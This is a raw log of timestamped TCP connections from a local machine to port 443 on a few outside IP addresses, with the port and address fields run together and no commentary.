                                                                                                                                                                            Oct 28, 2024 19:13:06.284303904 CET4435928013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.288544893 CET4435928113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.288913012 CET59281443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.288924932 CET4435928113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.289313078 CET59281443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.289319038 CET4435928113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.387640953 CET4435928213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.388206959 CET59282443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.388276100 CET4435928213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.388681889 CET59282443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.388705015 CET4435928213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.405464888 CET4435928313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.405896902 CET59283443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.405913115 CET4435928313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.406313896 CET59283443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.406320095 CET4435928313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.408446074 CET4435928413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.408876896 CET59284443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.408900023 CET4435928413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.409265995 CET59284443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.409270048 CET4435928413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.422627926 CET4435928013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.422661066 CET4435928013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.422734022 CET59280443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.422782898 CET4435928013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.422960043 CET59280443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.422960043 CET59280443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.422991991 CET4435928013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.423192024 CET4435928013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.423264980 CET4435928013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.423329115 CET59280443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.425648928 CET59285443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.425688028 CET4435928513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.425946951 CET59285443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.426094055 CET59285443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.426104069 CET4435928513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.428138018 CET4435928113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.428415060 CET4435928113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.428487062 CET59281443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.428518057 CET59281443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.428530931 CET4435928113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.428539991 CET59281443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.428545952 CET4435928113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.430774927 CET59286443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.430856943 CET4435928613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.430932999 CET59286443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.431041002 CET59286443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.431061029 CET4435928613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.527970076 CET4435928213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.527992964 CET4435928213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.528053045 CET59282443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.528057098 CET4435928213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.528112888 CET59282443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.528359890 CET59282443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.528409004 CET4435928213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.528467894 CET59282443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.528486013 CET4435928213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.531580925 CET59287443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.531615973 CET4435928713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.531680107 CET59287443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.531924963 CET59287443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.531934023 CET4435928713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.543927908 CET4435928313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.543967009 CET4435928313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.544014931 CET59283443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.544032097 CET4435928313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.544270039 CET59283443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.544281006 CET4435928313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.544290066 CET59283443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.544430017 CET4435928313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.544460058 CET4435928313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.544504881 CET59283443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.546885967 CET4435928413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.546904087 CET59288443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.546911955 CET4435928413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.546946049 CET4435928813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.546969891 CET59284443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.546998024 CET4435928413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.546998024 CET59288443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.547082901 CET4435928413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.547101021 CET59284443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.547101021 CET59284443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.547152042 CET4435928413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.547189951 CET59284443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.547202110 CET4435928413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.548000097 CET59288443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.548018932 CET4435928813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.549422026 CET59289443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.549474001 CET4435928913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:06.549552917 CET59289443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.549685955 CET59289443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:06.549709082 CET4435928913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.091726065 CET59290443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.091753006 CET44359290162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.091821909 CET59290443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.091993093 CET59291443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.092065096 CET44359291162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.092163086 CET59290443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.092176914 CET44359290162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.092197895 CET59291443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.092375040 CET59291443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.092401981 CET44359291162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.182997942 CET4435928513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.202543020 CET59285443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.202567101 CET4435928513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.203406096 CET59285443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.203411102 CET4435928513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.223278999 CET4435928613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.223987103 CET59286443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.224013090 CET4435928613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.224874020 CET59286443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.224879980 CET4435928613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.277268887 CET4435928713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.277797937 CET59287443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.277811050 CET4435928713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.278455973 CET59287443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.278460026 CET4435928713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.308837891 CET4435928813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.309294939 CET59288443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.309312105 CET4435928813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.309353113 CET4435928913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.309751987 CET59288443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.309756994 CET4435928813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.310049057 CET59289443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.310077906 CET4435928913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.310647964 CET59289443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.310659885 CET4435928913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.336170912 CET4435928513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.336227894 CET4435928513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.336347103 CET4435928513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.336499929 CET59285443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.336729050 CET59285443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.336750031 CET4435928513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.336761951 CET59285443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.336769104 CET4435928513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.340523958 CET59292443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.340562105 CET4435929213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.340729952 CET59292443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.340907097 CET59292443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.340917110 CET4435929213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.368568897 CET4435928613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.368633032 CET4435928613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.368794918 CET59286443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.368954897 CET59286443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.368971109 CET4435928613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.368982077 CET59286443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.368985891 CET4435928613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.372891903 CET59293443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.372914076 CET4435929313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.373162031 CET59293443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.373353004 CET59293443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.373363972 CET4435929313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.416734934 CET4435928713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.416809082 CET4435928713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.419004917 CET59287443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.448734045 CET4435928813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.448812008 CET4435928813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.449139118 CET59288443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.450519085 CET4435928913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.450609922 CET4435928913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.450691938 CET59289443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.703360081 CET44359291162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.705077887 CET44359290162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.744471073 CET59290443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.744486094 CET59291443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.770979881 CET59291443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.771003962 CET44359291162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.771529913 CET44359291162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.772270918 CET59290443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.772285938 CET44359290162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.772604942 CET59291443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.772708893 CET44359291162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.772816896 CET44359290162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.773586035 CET59287443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.773586035 CET59287443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.773621082 CET4435928713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.773633003 CET4435928713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.773921013 CET59288443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.773938894 CET4435928813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.773948908 CET59288443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.773952961 CET4435928813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.774256945 CET59290443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.774344921 CET44359290162.159.61.3192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.775553942 CET59289443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.775590897 CET4435928913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.775626898 CET59289443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.775643110 CET4435928913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.779819965 CET59294443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.779872894 CET4435929413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.779990911 CET59294443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.781056881 CET59295443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.781083107 CET4435929513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.781271935 CET59295443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.781708956 CET59294443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.781722069 CET4435929413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.781789064 CET59295443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.781797886 CET4435929513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.783077002 CET59296443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.783159018 CET4435929613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.783480883 CET59296443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.783617973 CET59296443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:07.783653975 CET4435929613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.822594881 CET59290443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.822603941 CET59291443192.168.2.4162.159.61.3
                                                                                                                                                                            Oct 28, 2024 19:13:07.913631916 CET59297443192.168.2.423.218.232.185
                                                                                                                                                                            Oct 28, 2024 19:13:07.913685083 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:07.913765907 CET59297443192.168.2.423.218.232.185
                                                                                                                                                                            Oct 28, 2024 19:13:07.913928032 CET59297443192.168.2.423.218.232.185
                                                                                                                                                                            Oct 28, 2024 19:13:07.913952112 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.107880116 CET4435929213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.108531952 CET59292443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.108560085 CET4435929213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.109019041 CET59292443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.109024048 CET4435929213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.152079105 CET4435929313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.154381990 CET59293443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.154406071 CET4435929313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.154875040 CET59293443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.154879093 CET4435929313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.248300076 CET4435929213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.248337030 CET4435929213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.248405933 CET4435929213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.248404980 CET59292443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.248450041 CET59292443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.248636961 CET59292443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.248653889 CET4435929213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.248672009 CET59292443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.248676062 CET4435929213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.251961946 CET59298443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.252047062 CET4435929813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.252243996 CET59298443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.252413034 CET59298443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.252449036 CET4435929813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.290237904 CET4435929313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.290266037 CET4435929313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.290321112 CET59293443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.290334940 CET4435929313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.290380001 CET59293443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.290555954 CET59293443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.290565968 CET4435929313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.290577888 CET59293443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.290581942 CET4435929313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.294056892 CET59299443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.294090986 CET4435929913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.294157028 CET59299443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.294390917 CET59299443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.294399023 CET4435929913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.522315025 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.522600889 CET59297443192.168.2.423.218.232.185
                                                                                                                                                                            Oct 28, 2024 19:13:08.522614956 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.523633003 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.523706913 CET59297443192.168.2.423.218.232.185
                                                                                                                                                                            Oct 28, 2024 19:13:08.524880886 CET59297443192.168.2.423.218.232.185
                                                                                                                                                                            Oct 28, 2024 19:13:08.524943113 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.525185108 CET59297443192.168.2.423.218.232.185
                                                                                                                                                                            Oct 28, 2024 19:13:08.525191069 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.537113905 CET4435929513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.538170099 CET59295443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.538183928 CET4435929513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.538826942 CET59295443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.538830996 CET4435929513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.541852951 CET4435929413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.542402983 CET4435929613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.542637110 CET59294443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.542666912 CET4435929413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.543632984 CET59294443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.543642998 CET4435929413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.545727015 CET59296443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.545798063 CET4435929613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.551479101 CET59296443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.551503897 CET4435929613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.572624922 CET59297443192.168.2.423.218.232.185
                                                                                                                                                                            Oct 28, 2024 19:13:08.674711943 CET4435929513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.674741030 CET4435929513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.674768925 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.674798965 CET4435929513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.674804926 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.674813032 CET59295443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.674841881 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.674854994 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.674877882 CET59297443192.168.2.423.218.232.185
                                                                                                                                                                            Oct 28, 2024 19:13:08.674885988 CET59295443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.674890995 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.674902916 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.674920082 CET59297443192.168.2.423.218.232.185
                                                                                                                                                                            Oct 28, 2024 19:13:08.674947023 CET59297443192.168.2.423.218.232.185
                                                                                                                                                                            Oct 28, 2024 19:13:08.675295115 CET59295443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.675307035 CET4435929513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.675322056 CET59295443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.675326109 CET4435929513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.676207066 CET59297443192.168.2.423.218.232.185
                                                                                                                                                                            Oct 28, 2024 19:13:08.676222086 CET4435929723.218.232.185192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.680133104 CET59300443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.680169106 CET4435930013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:13:08.680232048 CET59300443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:13:08.680392981 CET59300443192.168.2.413.107.253.45
